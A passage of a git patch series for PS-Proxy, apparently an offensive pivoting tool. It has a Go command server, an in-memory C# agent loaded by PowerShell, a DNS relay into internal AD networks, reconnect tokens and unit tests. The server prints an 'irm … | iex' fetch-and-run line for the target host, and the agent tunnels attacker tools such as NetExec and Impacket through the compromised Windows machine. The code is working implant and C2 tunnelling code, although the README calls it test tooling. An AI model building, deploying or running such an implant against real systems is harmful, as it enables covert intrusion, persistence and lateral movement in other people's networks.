t.Fatal("reused enrollment token without reconnect token should fail") + } +} + +func TestReconnectTokenSurvivesEnrollmentURLTTL(t *testing.T) { + store := NewStore(50 * time.Millisecond) + sess, err := store.Create("c2.example.com", 443, "pin", "") + if err != nil { + t.Fatalf("create session: %v", err) + } + if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil { + t.Fatalf("initial enrollment failed: %v", err) + } + time.Sleep(75 * time.Millisecond) + if err := store.Authenticate("", sess.ReconnectToken); err != nil { + t.Fatalf("reconnect token should survive URL TTL after enrollment: %v", err) + } +} diff --git a/tools/build-agent.ps1 b/tools/build-agent.ps1 index eeacaf5..a850ab3 100644 --- a/tools/build-agent.ps1 +++ b/tools/build-agent.ps1 @@ -23,6 +23,8 @@ $template = $template.Replace('{{.Server}}', '__SERVER__') $template = $template.Replace('{{.Port}}', '443') $template = $template.Replace('{{.CertPin}}', '__CERT_PIN__') $template = $template.Replace('{{.EnrollToken}}', '__ENROLL_TOKEN__') +$template = $template.Replace('{{.ReconnectToken}}', '__RECONNECT_TOKEN__') +$template = $template.Replace('{{.DNSTarget}}', '__DNS_TARGET__') [IO.File]::WriteAllText($OutFile, $template, [Text.Encoding]::UTF8) Write-Host "Wrote $OutFile" Write-Host "Wrote $b64Out" From a391528ebf78b6be2427bbbb3e71ffd42d022487 Mon Sep 17 00:00:00 2001 From: Harrison-Wells-Cyber Date: Wed, 22 Jul 2026 12:57:28 -0700 Subject: [PATCH 2/2] Preserve base64 in staged agent rendering --- README.md | 15 +- agent/PSProxy.Agent/PSProxy.Agent.cs | 82 +++++++- agent/loader/agent.ps1.tmpl | 10 +- cmd/psproxy-server/main.go | 293 ++++++++++++++++++++++++--- cmd/psproxy-server/main_test.go | 126 ++++++++++++ internal/protocol/protocol.go | 2 + internal/staging/staging.go | 68 ++++--- internal/staging/staging_test.go | 67 ++++++ tools/build-agent.ps1 | 2 + 9 files changed, 595 insertions(+), 70 deletions(-) create mode 100644 cmd/psproxy-server/main_test.go create mode 100644 internal/staging/staging_test.go diff --git a/README.md b/README.md index 9fbbde0..dd98c8e 100644 --- a/README.md +++ b/README.md @@ -96,7 +96,10 @@ sudo ./psproxy-server \ --cert /etc/letsencrypt/live/c2.example.com/fullchain.pem \ --key /etc/letsencrypt/live/c2.example.com/privkey.pem \ --route 10.10.10.0/24 \ - --redirect + --redirect \ + --max-streams 256 \ + --dns-listen 127.0.0.1:5353 \ + --dns-target 10.10.10.10:53 ``` With `--redirect`, PS-Proxy creates an iptables NAT chain for each `--route` and @@ -140,7 +143,8 @@ ldapsearch -x -H ldap://127.0.0.1:1389 -D 'user@example.local' -W -b 'DC=example Transparent redirect mode is the recommended test-environment workflow right now. The fixed-target relay remains useful when you want a single local port mapped to -a single target for debugging. +a single target for debugging. Use `--max-streams` to cap concurrent proxied TCP +connections during high-concurrency tools such as NetExec; the default is 256. When `--dns-listen` and `--dns-target` are set together, the server exposes a UDP DNS listener and forwards raw DNS queries through the enrolled agent to the internal DNS server reachable from the agent host. ## Security notes @@ -163,10 +167,14 @@ Implemented now: - Go TLS listener with mixed HTTP staging and raw agent tunnel handling. - Leaf certificate pin calculation for generated agent configuration. - Short-lived one-time staging URLs. -- One-time enrollment token validation for the raw tunnel. +- One-time enrollment token validation for the raw tunnel plus reconnect-token authentication after first enrollment. +- Agent auto-reconnect with exponential backoff for transient tunnel failures. - Framed multiplexed stream protocol. - Linux transparent TCP redirect mode for direct local-tool TCP connections to routed target IPs. - Fixed-target TCP relay mode for protocol validation. +- Bounded concurrent stream handling with per-stream local write queues so one slow local TCP client cannot block the whole multiplexed agent session. +- Optional UDP DNS relay that forwards raw DNS queries through the agent to an internal DNS server. +- JSON `/status` endpoint for agent and stream visibility. - C# agent stream relay that opens normal outbound `TcpClient` connections from the Windows host. - PowerShell loader template that loads a compressed/base64 managed assembly from @@ -190,5 +198,6 @@ matrix that includes: - NetExec SMB/LDAP tests; - Impacket SMB/LDAP/RPC tests; - reconnect and stale route cleanup tests; +- DNS relay tests against an internal AD DNS server; - malformed frame and enrollment fuzz tests; - certificate pin mismatch tests. diff --git a/agent/PSProxy.Agent/PSProxy.Agent.cs b/agent/PSProxy.Agent/PSProxy.Agent.cs index 4d7c014..bc9cf3d 100644 --- a/agent/PSProxy.Agent/PSProxy.Agent.cs +++ b/agent/PSProxy.Agent/PSProxy.Agent.cs @@ -14,38 +14,63 @@ namespace PSProxy.Agent { public sealed class Tunnel { - private const byte FrameOpen = 1, FrameOpenOK = 2, FrameOpenFail = 3, FrameData = 4, FrameClose = 5, FramePing = 6, FramePong = 7; + private const byte FrameOpen = 1, FrameOpenOK = 2, FrameOpenFail = 3, FrameData = 4, FrameClose = 5, FramePing = 6, FramePong = 7, FrameDNSQuery = 8, FrameDNSReply = 9; private const int MaxPayload = 1 << 20; private readonly string server; private readonly int port; private readonly string certPin; private readonly string enrollToken; + private readonly string reconnectToken; + private readonly string dnsTarget; private readonly ConcurrentDictionary streams = new ConcurrentDictionary(); private readonly object sendLock = new object(); private SslStream tls; private volatile bool stopping; - public Tunnel(string server, int port, string certPin, string enrollToken) + public Tunnel(string server, int port, string certPin, string enrollToken, string reconnectToken, string dnsTarget) { this.server = server; this.port = port; this.certPin = NormalizeHex(certPin); this.enrollToken = enrollToken; + this.reconnectToken = reconnectToken ?? ""; + this.dnsTarget = dnsTarget ?? ""; if (this.certPin.Length != 64) throw new ArgumentException("CertPin must be a SHA-256 hex string"); if (String.IsNullOrWhiteSpace(enrollToken)) throw new ArgumentException("EnrollToken is required"); } public void Run() + { + int delayMs = 1000; + while (!stopping) + { + try + { + RunOnce(); + delayMs = 1000; + } + catch (Exception ex) + { + Console.Error.WriteLine("[ps-proxy] tunnel error: {0}", ex.Message); + CloseAllStreams(); + if (stopping) break; + Thread.Sleep(delayMs); + delayMs = Math.Min(delayMs * 2, 30000); + } + } + } + + private void RunOnce() { Console.Error.WriteLine("[ps-proxy] connecting to {0}:{1}", server, port); using (var tcp = new TcpClient()) { tcp.NoDelay = true; - tcp.Connect(server, port); + ConnectWithTimeout(tcp, server, port, 15000); using (tls = new SslStream(tcp.GetStream(), false, ValidateServerCertificate)) { tls.AuthenticateAsClient(server, null, SslProtocols.Tls12, false); - WriteAscii("PSP1\nENROLL " + enrollToken + "\n"); + WriteAscii("PSP1\nENROLL " + enrollToken + " " + reconnectToken + "\n"); Frame hello = ReadFrame(); if (hello.Type != FramePong || Encoding.ASCII.GetString(hello.Payload) != "OK") throw new Exception("server did not accept enrollment"); Console.Error.WriteLine("[ps-proxy] enrolled and ready"); @@ -65,6 +90,7 @@ namespace PSProxy.Agent case FrameData: HandleData(f.StreamID, f.Payload); break; case FrameClose: CloseStream(f.StreamID, false); break; case FramePing: SendFrame(new Frame(f.StreamID, FramePong, new byte[0])); break; + case FrameDNSQuery: StartDnsQuery(f.StreamID, f.Payload); break; } } } @@ -76,7 +102,7 @@ namespace PSProxy.Agent string host; int dstPort; SplitTarget(target, out host, out dstPort); var client = new TcpClient(); client.NoDelay = true; - client.Connect(host, dstPort); + ConnectWithTimeout(client, host, dstPort, 15000); var ctx = new StreamCtx(sid, client); if (!streams.TryAdd(sid, ctx)) { client.Close(); throw new Exception("duplicate stream"); } SendFrame(new Frame(sid, FrameOpenOK, new byte[0])); @@ -98,6 +124,36 @@ namespace PSProxy.Agent catch { CloseStream(sid, true); } } + private void StartDnsQuery(ulong sid, byte[] payload) + { + var t = new Thread(delegate() { HandleDnsQuery(sid, payload); }); + t.IsBackground = true; + t.Start(); + } + + private void HandleDnsQuery(ulong sid, byte[] payload) + { + try + { + if (String.IsNullOrWhiteSpace(dnsTarget)) throw new Exception("DNS target is not configured"); + string host; int dstPort; SplitTarget(dnsTarget, out host, out dstPort); + using (var udp = new UdpClient()) + { + udp.Client.ReceiveTimeout = 5000; + udp.Connect(host, dstPort); + udp.Send(payload, payload.Length); + IPEndPoint ep = null; + byte[] resp = udp.Receive(ref ep); + SendFrame(new Frame(sid, FrameDNSReply, resp)); + } + } + catch (Exception ex) + { + Console.Error.WriteLine("[ps-proxy] DNS query failed: " + ex.Message); + SendFrame(new Frame(sid, FrameDNSReply, new byte[0])); + } + } + private void PumpTargetToServer(StreamCtx ctx) { byte[] buf = new byte[32768]; @@ -126,6 +182,11 @@ namespace PSProxy.Agent } } + private void CloseAllStreams() + { + foreach (ulong sid in streams.Keys) CloseStream(sid, false); + } + private void SendFrame(Frame f) { if (f.Payload == null) f.Payload = new byte[0]; @@ -192,6 +253,17 @@ namespace PSProxy.Agent if (dstPort < 1 || dstPort > 65535) throw new ArgumentException("invalid port"); } + private static void ConnectWithTimeout(TcpClient client, string host, int dstPort, int timeoutMs) + { + IAsyncResult ar = client.BeginConnect(host, dstPort, null, null); + if (!ar.AsyncWaitHandle.WaitOne(timeoutMs)) + { + try { client.Close(); } catch { } + throw new TimeoutException("connect timed out: " + host + ":" + dstPort); + } + client.EndConnect(ar); + } + private static string NormalizeHex(string s) { return (s ?? "").Trim().ToLowerInvariant().Replace(":", "").Replace(" ", ""); } private static void WriteI32BE(byte[] b, int o, int v) { b[o] = (byte)(v >> 24); b[o + 1] = (byte)(v >> 16); b[o + 2] = (byte)(v >> 8); b[o + 3] = (byte)v; } private static int ReadI32BE(byte[] b, int o) { return ((int)b[o] << 24) | ((int)b[o + 1] << 16) | ((int)b[o + 2] << 8) | (int)b[o + 3]; } diff --git a/agent/loader/agent.ps1.tmpl b/agent/loader/agent.ps1.tmpl index 4bf9f05..4b6349a 100644 --- a/agent/loader/agent.ps1.tmpl +++ b/agent/loader/agent.ps1.tmpl @@ -4,6 +4,8 @@ param( [int]$Port = {{.Port}}, [string]$CertPin = "{{.CertPin}}", [string]$EnrollToken = "{{.EnrollToken}}", + [string]$ReconnectToken = "{{.ReconnectToken}}", + [string]$DNSTarget = "{{.DNSTarget}}", [switch]$NoAutoStart ) $ErrorActionPreference = "Stop" @@ -29,10 +31,12 @@ function Start-PSTunnel { [Parameter(Mandatory=$true)][string]$Server, [int]$Port = 443, [Parameter(Mandatory=$true)][string]$CertPin, - [Parameter(Mandatory=$true)][string]$EnrollToken + [Parameter(Mandatory=$true)][string]$EnrollToken, + [string]$ReconnectToken = "", + [string]$DNSTarget = "" ) if (-not ("PSProxy.Agent.Tunnel" -as [type])) { Import-PSProxyAgentAssembly } - $t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $CertPin, $EnrollToken) + $t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $CertPin, $EnrollToken, $ReconnectToken, $DNSTarget) $t.Run() } -if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -CertPin $CertPin -EnrollToken $EnrollToken } +if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -CertPin $CertPin -EnrollToken $EnrollToken -ReconnectToken $ReconnectToken -DNSTarget $DNSTarget } diff --git a/cmd/psproxy-server/main.go b/cmd/psproxy-server/main.go index 52cfe52..9ce6c6f 100644 --- a/cmd/psproxy-server/main.go +++ b/cmd/psproxy-server/main.go @@ -5,11 +5,11 @@ import ( "crypto/sha256" "crypto/tls" "encoding/hex" + "encoding/json" "encoding/pem" "errors" "flag" "fmt" - "html/template" "io" "log" "net" @@ -22,6 +22,7 @@ import ( "sync" "sync/atomic" "syscall" + "text/template" "time" "github.com/psproxy/psproxy/internal/protocol" @@ -38,6 +39,9 @@ func main() { agentAssemblyFile := flag.String("agent-assembly-b64-file", "", "file containing compressed/base64 PSProxy.Agent.dll; defaults to release/agent_assembly.b64 when present") redirect := flag.Bool("redirect", false, "install Linux iptables REDIRECT rules for --route CIDRs and relay original destinations through the agent") redirectPort := flag.Int("redirect-port", 15080, "local transparent redirect listener port") + maxStreams := flag.Int("max-streams", 256, "maximum concurrent proxied TCP streams") + dnsListen := flag.String("dns-listen", "", "optional UDP DNS listener that forwards queries through the agent, e.g. 127.0.0.1:5353") + dnsTarget := flag.String("dns-target", "", "DNS server reachable by the agent for --dns-listen queries, e.g. 10.10.10.10:53") tcpListen := flag.String("tcp-listen", "", "developer TCP relay listener, e.g. 127.0.0.1:1389") tcpTarget := flag.String("tcp-target", "", "developer TCP relay target opened by the agent, e.g. 10.10.10.219:389") routes := multiFlag{} @@ -57,9 +61,15 @@ func main() { if (*tcpListen == "") != (*tcpTarget == "") { log.Fatal("--tcp-listen and --tcp-target must be supplied together") } + if (*dnsListen == "") != (*dnsTarget == "") { + log.Fatal("--dns-listen and --dns-target must be supplied together") + } if *redirect && len(routes) == 0 { log.Fatal("--redirect requires at least one --route CIDR") } + if err := validateRoutes(routes); err != nil { + log.Fatal(err) + } pin, err := certPin(*cert) if err != nil { log.Fatalf("certificate pin failed: %v", err) @@ -73,14 +83,15 @@ func main() { } tmpl := template.Must(template.ParseFiles(*agentTemplate)) store := staging.NewStore(*ttl) - sess, err := store.Create(*domain, *port, pin) + sess, err := store.Create(*domain, *port, pin, *dnsTarget) if err != nil { log.Fatal(err) } - server := NewTunnelServer(store) + server := NewTunnelServer(store, *maxStreams) mux := http.NewServeMux() mux.HandleFunc("GET /a/{id}", staging.AgentHandler(store, tmpl, assembly)) mux.HandleFunc("GET /healthz", func(w http.ResponseWriter, r *http.Request) { _, _ = w.Write([]byte("ok\n")) }) + mux.HandleFunc("GET /status", statusHandler(server)) var redirectCleanup func() if *redirect { redirectCleanup = setupRedirectOrFatal(routes, *redirectPort) @@ -90,6 +101,9 @@ func main() { if *tcpListen != "" { go serveTCPRelay(*tcpListen, *tcpTarget, server) } + if *dnsListen != "" { + go serveDNSRelay(*dnsListen, server) + } installSignalCleanup(redirectCleanup) addr := fmt.Sprintf("%s:%d", *listen, *port) log.Printf("PS-Proxy Go server starting on https://%s", addr) @@ -102,18 +116,28 @@ func main() { if *tcpListen != "" { log.Printf("Developer TCP relay: %s -> agent -> %s", *tcpListen, *tcpTarget) } + if *dnsListen != "" { + log.Printf("DNS relay: %s -> agent -> %s", *dnsListen, *dnsTarget) + } log.Printf("Run this on the Windows host: irm %s/a/%s | iex", publicURL(*domain, *port), sess.ID) log.Fatal(serveMixedTLS(addr, *cert, *key, mux, server)) } type TunnelServer struct { - store *staging.Store - mu sync.Mutex - session *AgentSession - nextID atomic.Uint64 + store *staging.Store + mu sync.Mutex + session *AgentSession + nextID atomic.Uint64 + dnsID atomic.Uint64 + maxStreams int } -func NewTunnelServer(store *staging.Store) *TunnelServer { return &TunnelServer{store: store} } +func NewTunnelServer(store *staging.Store, maxStreams int) *TunnelServer { + if maxStreams < 1 { + maxStreams = 1 + } + return &TunnelServer{store: store, maxStreams: maxStreams} +} func (s *TunnelServer) SetSession(a *AgentSession) { s.mu.Lock() @@ -127,13 +151,23 @@ func (s *TunnelServer) SetSession(a *AgentSession) { func (s *TunnelServer) Current() *AgentSession { s.mu.Lock(); defer s.mu.Unlock(); return s.session } +func (s *TunnelServer) ClearSession(a *AgentSession) { + s.mu.Lock() + if s.session == a { + s.session = nil + } + s.mu.Unlock() +} + func (s *TunnelServer) OpenAttached(target string, local net.Conn) (*AgentSession, uint64, error) { a := s.Current() if a == nil { return nil, 0, errors.New("no enrolled agent connected") } id := s.nextID.Add(1) - a.AttachLocal(id, local) + if err := a.AttachLocal(id, local); err != nil { + return nil, 0, err + } if err := a.Open(id, target); err != nil { a.RemoveLocal(id) return nil, 0, err @@ -142,21 +176,45 @@ func (s *TunnelServer) OpenAttached(target string, local net.Conn) (*AgentSessio } type AgentSession struct { - conn net.Conn - br *bufio.Reader - sendMu sync.Mutex - closeOnce sync.Once - closed chan struct{} - mu sync.Mutex - pending map[uint64]chan error - locals map[uint64]net.Conn + conn net.Conn + br *bufio.Reader + sendMu sync.Mutex + closeOnce sync.Once + closed chan struct{} + mu sync.Mutex + pending map[uint64]chan error + dnsPending map[uint64]chan []byte + locals map[uint64]*localStream + maxStreams int } -func NewAgentSession(c net.Conn, br *bufio.Reader) *AgentSession { - return &AgentSession{conn: c, br: br, closed: make(chan struct{}), pending: map[uint64]chan error{}, locals: map[uint64]net.Conn{}} +func NewAgentSession(c net.Conn, br *bufio.Reader, maxStreams int) *AgentSession { + if maxStreams < 1 { + maxStreams = 1 + } + return &AgentSession{conn: c, br: br, closed: make(chan struct{}), pending: map[uint64]chan error{}, dnsPending: map[uint64]chan []byte{}, locals: map[uint64]*localStream{}, maxStreams: maxStreams} } -func (a *AgentSession) Close() { a.closeOnce.Do(func() { close(a.closed); _ = a.conn.Close() }) } +func (a *AgentSession) Close() { + a.closeOnce.Do(func() { + close(a.closed) + _ = a.conn.Close() + a.mu.Lock() + for id, ch := range a.pending { + delete(a.pending, id) + ch <- errors.New("agent session closed") + } + for id, ch := range a.dnsPending { + delete(a.dnsPending, id) + close(ch) + } + for id, ls := range a.locals { + delete(a.locals, id) + ls.close() + } + a.mu.Unlock() + }) +} func (a *AgentSession) send(f protocol.Frame) error { a.sendMu.Lock() @@ -186,16 +244,29 @@ func (a *AgentSession) Open(id uint64, target string) error { } } -func (a *AgentSession) AttachLocal(id uint64, c net.Conn) { +func (a *AgentSession) AttachLocal(id uint64, c net.Conn) error { a.mu.Lock() - a.locals[id] = c - a.mu.Unlock() + defer a.mu.Unlock() + select { + case <-a.closed: + return errors.New("agent session closed") + default: + } + if len(a.locals) >= a.maxStreams { + return fmt.Errorf("maximum concurrent streams reached: %d", a.maxStreams) + } + a.locals[id] = newLocalStream(c) + return nil } func (a *AgentSession) RemoveLocal(id uint64) { a.mu.Lock() + ls := a.locals[id] delete(a.locals, id) a.mu.Unlock() + if ls != nil { + ls.close() + } } func (a *AgentSession) Run() { @@ -225,18 +296,21 @@ func (a *AgentSession) Run() { } case protocol.FrameData: a.mu.Lock() - c := a.locals[f.StreamID] + ls := a.locals[f.StreamID] a.mu.Unlock() - if c != nil { - _, _ = c.Write(f.Payload) + if ls != nil && !ls.enqueue(f.Payload) { + a.RemoveLocal(f.StreamID) + _ = a.send(protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameClose}) } case protocol.FrameClose: + a.RemoveLocal(f.StreamID) + case protocol.FrameDNSReply: a.mu.Lock() - c := a.locals[f.StreamID] - delete(a.locals, f.StreamID) + ch := a.dnsPending[f.StreamID] + delete(a.dnsPending, f.StreamID) a.mu.Unlock() - if c != nil { - _ = c.Close() + if ch != nil { + ch <- f.Payload } case protocol.FramePing: _ = a.send(protocol.Frame{StreamID: f.StreamID, Type: protocol.FramePong}) @@ -244,6 +318,140 @@ func (a *AgentSession) Run() { } } +type localStream struct { + conn net.Conn + ch chan []byte + done chan struct{} + once sync.Once +} + +func newLocalStream(c net.Conn) *localStream { + ls := &localStream{conn: c, ch: make(chan []byte, 32), done: make(chan struct{})} + go ls.writeLoop() + return ls +} + +func (l *localStream) enqueue(payload []byte) bool { + buf := append([]byte(nil), payload...) + select { + case l.ch <- buf: + return true + case <-l.done: + return false + default: + return false + } +} + +func (l *localStream) writeLoop() { + defer l.close() + for { + select { + case payload := <-l.ch: + if _, err := l.conn.Write(payload); err != nil { + return + } + case <-l.done: + return + } + } +} + +func (l *localStream) close() { + l.once.Do(func() { + close(l.done) + _ = l.conn.Close() + }) +} + +func (s *TunnelServer) Status() map[string]any { + a := s.Current() + status := map[string]any{"agent_connected": a != nil, "max_streams": s.maxStreams} + if a != nil { + a.mu.Lock() + status["active_streams"] = len(a.locals) + status["pending_opens"] = len(a.pending) + status["pending_dns"] = len(a.dnsPending) + a.mu.Unlock() + } + return status +} + +func (s *TunnelServer) QueryDNS(query []byte) ([]byte, error) { + a := s.Current() + if a == nil { + return nil, errors.New("no enrolled agent connected") + } + id := s.dnsID.Add(1) + ch := make(chan []byte, 1) + a.mu.Lock() + select { + case <-a.closed: + a.mu.Unlock() + return nil, errors.New("agent session closed") + default: + } + a.dnsPending[id] = ch + a.mu.Unlock() + if err := a.send(protocol.Frame{StreamID: id, Type: protocol.FrameDNSQuery, Payload: query}); err != nil { + a.mu.Lock() + delete(a.dnsPending, id) + a.mu.Unlock() + return nil, err + } + select { + case resp, ok := <-ch: + if !ok { + return nil, errors.New("agent session closed") + } + if len(resp) == 0 { + return nil, errors.New("empty DNS response from agent") + } + return resp, nil + case <-time.After(5 * time.Second): + a.mu.Lock() + delete(a.dnsPending, id) + a.mu.Unlock() + return nil, errors.New("timeout waiting for DNS response") + } +} + +func statusHandler(server *TunnelServer) http.HandlerFunc { + return func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/json") + _ = json.NewEncoder(w).Encode(server.Status()) + } +} + +func serveDNSRelay(listenAddr string, server *TunnelServer) { + addr, err := net.ResolveUDPAddr("udp", listenAddr) + if err != nil { + log.Fatalf("dns relay resolve failed: %v", err) + } + conn, err := net.ListenUDP("udp", addr) + if err != nil { + log.Fatalf("dns relay listen failed: %v", err) + } + log.Printf("dns relay listening on udp://%s", listenAddr) + buf := make([]byte, 4096) + for { + n, client, err := conn.ReadFromUDP(buf) + if err != nil { + log.Printf("dns relay read failed: %v", err) + continue + } + query := append([]byte(nil), buf[:n]...) + go func() { + resp, err := server.QueryDNS(query) + if err != nil { + log.Printf("dns relay query failed: %v", err) + return + } + _, _ = conn.WriteToUDP(resp, client) + }() + } +} + func serveTransparentRelay(listenAddr string, server *TunnelServer) { ln, err := net.Listen("tcp4", listenAddr) if err != nil { @@ -299,6 +507,15 @@ func originalDst(c net.Conn) (string, error) { return target, nil } +func validateRoutes(routes []string) error { + for _, route := range routes { + if _, _, err := net.ParseCIDR(route); err != nil { + return fmt.Errorf("invalid --route CIDR %q: %w", route, err) + } + } + return nil +} + func setupRedirectOrFatal(routes []string, port int) func() { if os.Geteuid() != 0 { log.Fatal("--redirect requires root so iptables NAT rules can be installed") @@ -434,16 +651,27 @@ func handleAgent(conn net.Conn, br *bufio.Reader, server *TunnelServer) { _ = conn.Close() return } - if err := server.store.Enroll(strings.TrimSpace(strings.TrimPrefix(line, prefix))); err != nil { + fields := strings.Fields(strings.TrimPrefix(line, prefix)) + if len(fields) == 0 { + _ = conn.Close() + return + } + enrollToken := fields[0] + reconnectToken := "" + if len(fields) > 1 { + reconnectToken = fields[1] + } + if err := server.store.Authenticate(enrollToken, reconnectToken); err != nil { log.Printf("agent enrollment failed: %v", err) _ = conn.Close() return } - a := NewAgentSession(conn, br) + a := NewAgentSession(conn, br, server.maxStreams) server.SetSession(a) log.Printf("agent enrolled and connected from %s", conn.RemoteAddr()) _ = a.send(protocol.Frame{Type: protocol.FramePong, Payload: []byte("OK")}) a.Run() + server.ClearSession(a) } type singleListener struct { @@ -454,7 +682,6 @@ type singleListener struct { func (s *singleListener) Accept() (net.Conn, error) { if s.conn == nil { - <-s.done return nil, io.EOF } c := s.conn diff --git a/cmd/psproxy-server/main_test.go b/cmd/psproxy-server/main_test.go new file mode 100644 index 0000000..ad26c14 --- /dev/null +++ b/cmd/psproxy-server/main_test.go @@ -0,0 +1,126 @@ +package main + +import ( + "bufio" + "net" + "testing" + "time" + + "github.com/psproxy/psproxy/internal/protocol" + "github.com/psproxy/psproxy/internal/staging" +) + +func TestTunnelServerMaxStreams(t *testing.T) { + server := NewTunnelServer(staging.NewStore(time.Minute), 1) + agent, peer := net.Pipe() + defer peer.Close() + sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams) + defer sess.Close() + server.SetSession(sess) + + local1, remote1 := net.Pipe() + defer remote1.Close() + defer local1.Close() + if err := sess.AttachLocal(1, local1); err != nil { + t.Fatalf("first stream should attach: %v", err) + } + + local2, remote2 := net.Pipe() + defer remote2.Close() + defer local2.Close() + if err := sess.AttachLocal(2, local2); err == nil { + t.Fatal("second stream should be rejected at max stream limit") + } +} + +func TestLocalStreamBackpressureClosesConnection(t *testing.T) { + local, remote := net.Pipe() + defer remote.Close() + ls := newLocalStream(local) + defer ls.close() + + failed := false + for i := 0; i < cap(ls.ch)+10; i++ { + if !ls.enqueue([]byte("x")) { + failed = true + break + } + } + if !failed { + t.Fatal("enqueue should eventually fail when the local write queue is full") + } +} + +func TestTunnelServerQueryDNS(t *testing.T) { + server := NewTunnelServer(staging.NewStore(time.Minute), 2) + agent, peer := net.Pipe() + defer peer.Close() + sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams) + defer sess.Close() + server.SetSession(sess) + go sess.Run() + + go func() { + f, err := protocol.ReadFrame(peer) + if err != nil { + return + } + _ = protocol.WriteFrame(peer, protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameDNSReply, Payload: []byte("dns-response")}) + }() + + resp, err := server.QueryDNS([]byte("dns-query")) + if err != nil { + t.Fatalf("dns query failed: %v", err) + } + if string(resp) != "dns-response" { + t.Fatalf("unexpected dns response: %q", resp) + } +} + +func TestValidateRoutes(t *testing.T) { + if err := validateRoutes([]string{"10.0.0.0/24", "192.168.1.10/32"}); err != nil { + t.Fatalf("valid routes rejected: %v", err) + } + if err := validateRoutes([]string{"not-a-cidr"}); err == nil { + t.Fatal("invalid CIDR should be rejected") + } +} + +func TestTunnelServerQueryDNSEmptyResponseFails(t *testing.T) { + server := NewTunnelServer(staging.NewStore(time.Minute), 2) + agent, peer := net.Pipe() + defer peer.Close() + sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams) + defer sess.Close() + server.SetSession(sess) + go sess.Run() + + go func() { + f, err := protocol.ReadFrame(peer) + if err != nil { + return + } + _ = protocol.WriteFrame(peer, protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameDNSReply}) + }() + + if _, err := server.QueryDNS([]byte("dns-query")); err == nil { + t.Fatal("empty DNS replies should fail") + } +} + +func TestSingleListenerAcceptReturnsEOFAfterFirstConn(t *testing.T) { + c1, c2 := net.Pipe() + defer c1.Close() + defer c2.Close() + ln := &singleListener{conn: c1, done: make(chan struct{})} + got, err := ln.Accept() + if err != nil { + t.Fatalf("first accept failed: %v", err) + } + if got != c1 { + t.Fatal("first accept returned unexpected connection") + } + if _, err := ln.Accept(); err == nil { + t.Fatal("second accept should return EOF") + } +} diff --git a/internal/protocol/protocol.go b/internal/protocol/protocol.go index 08787ca..1eaf091 100644 --- a/internal/protocol/protocol.go +++ b/internal/protocol/protocol.go @@ -16,6 +16,8 @@ const ( FrameClose byte = 5 FramePing byte = 6 FramePong byte = 7 + FrameDNSQuery byte = 8 + FrameDNSReply byte = 9 MaxPayload = 1 << 20 ) diff --git a/internal/staging/staging.go b/internal/staging/staging.go index 72a6d83..71414ae 100644 --- a/internal/staging/staging.go +++ b/internal/staging/staging.go @@ -4,32 +4,35 @@ import ( "crypto/rand" "encoding/base64" "errors" - "html/template" "net/http" "sync" + "text/template" "time" ) type Session struct { - ID string - Server string - Port int - CertPin string - EnrollToken string - ExpiresAt time.Time - Delivered bool - Enrolled bool + ID string + Server string + Port int + CertPin string + EnrollToken string + ReconnectToken string + DNSTarget string + ExpiresAt time.Time + Delivered bool + Enrolled bool } type Store struct { - mu sync.Mutex - sessions map[string]*Session - tokens map[string]*Session - ttl time.Duration + mu sync.Mutex + sessions map[string]*Session + tokens map[string]*Session + reconnects map[string]*Session + ttl time.Duration } func NewStore(ttl time.Duration) *Store { - return &Store{sessions: map[string]*Session{}, tokens: map[string]*Session{}, ttl: ttl} + return &Store{sessions: map[string]*Session{}, tokens: map[string]*Session{}, reconnects: map[string]*Session{}, ttl: ttl} } func NewSecret(n int) (string, error) { @@ -40,7 +43,7 @@ func NewSecret(n int) (string, error) { return base64.RawURLEncoding.EncodeToString(b), nil } -func (s *Store) Create(server string, port int, certPin string) (*Session, error) { +func (s *Store) Create(server string, port int, certPin, dnsTarget string) (*Session, error) { id, err := NewSecret(18) if err != nil { return nil, err @@ -49,11 +52,16 @@ func (s *Store) Create(server string, port int, certPin string) (*Session, error if err != nil { return nil, err } - sess := &Session{ID: id, Server: server, Port: port, CertPin: certPin, EnrollToken: tok, ExpiresAt: time.Now().Add(s.ttl)} + reconnect, err := NewSecret(32) + if err != nil { + return nil, err + } + sess := &Session{ID: id, Server: server, Port: port, CertPin: certPin, EnrollToken: tok, ReconnectToken: reconnect, DNSTarget: dnsTarget, ExpiresAt: time.Now().Add(s.ttl)} s.mu.Lock() defer s.mu.Unlock() s.sessions[id] = sess s.tokens[tok] = sess + s.reconnects[reconnect] = sess return sess, nil } @@ -67,6 +75,7 @@ func (s *Store) RedeemScript(id string) (*Session, error) { if time.Now().After(sess.ExpiresAt) { delete(s.sessions, id) delete(s.tokens, sess.EnrollToken) + delete(s.reconnects, sess.ReconnectToken) return nil, errors.New("enrollment expired") } if sess.Delivered { @@ -76,19 +85,24 @@ func (s *Store) RedeemScript(id string) (*Session, error) { return sess, nil } -func (s *Store) Enroll(token string) error { +func (s *Store) Authenticate(enrollToken, reconnectToken string) error { s.mu.Lock() defer s.mu.Unlock() - sess := s.tokens[token] + sess := s.reconnects[reconnectToken] + if sess != nil && sess.Enrolled { + return nil + } + sess = s.tokens[enrollToken] if sess == nil { return errors.New("invalid enrollment token") } if time.Now().After(sess.ExpiresAt) { delete(s.sessions, sess.ID) - delete(s.tokens, token) + delete(s.tokens, enrollToken) + delete(s.reconnects, sess.ReconnectToken) return errors.New("enrollment expired") } - if sess.Enrolled { + if sess.Enrolled && sess.ReconnectToken != reconnectToken { return errors.New("enrollment token already used") } sess.Enrolled = true @@ -96,11 +110,13 @@ func (s *Store) Enroll(token string) error { } type AgentTemplateData struct { - AssemblyB64 string - Server string - Port int - CertPin string - EnrollToken string + AssemblyB64 string + Server string + Port int + CertPin string + EnrollToken string + ReconnectToken string + DNSTarget string } func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) http.HandlerFunc { @@ -113,6 +129,6 @@ func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) htt } w.Header().Set("Content-Type", "text/plain; charset=utf-8") 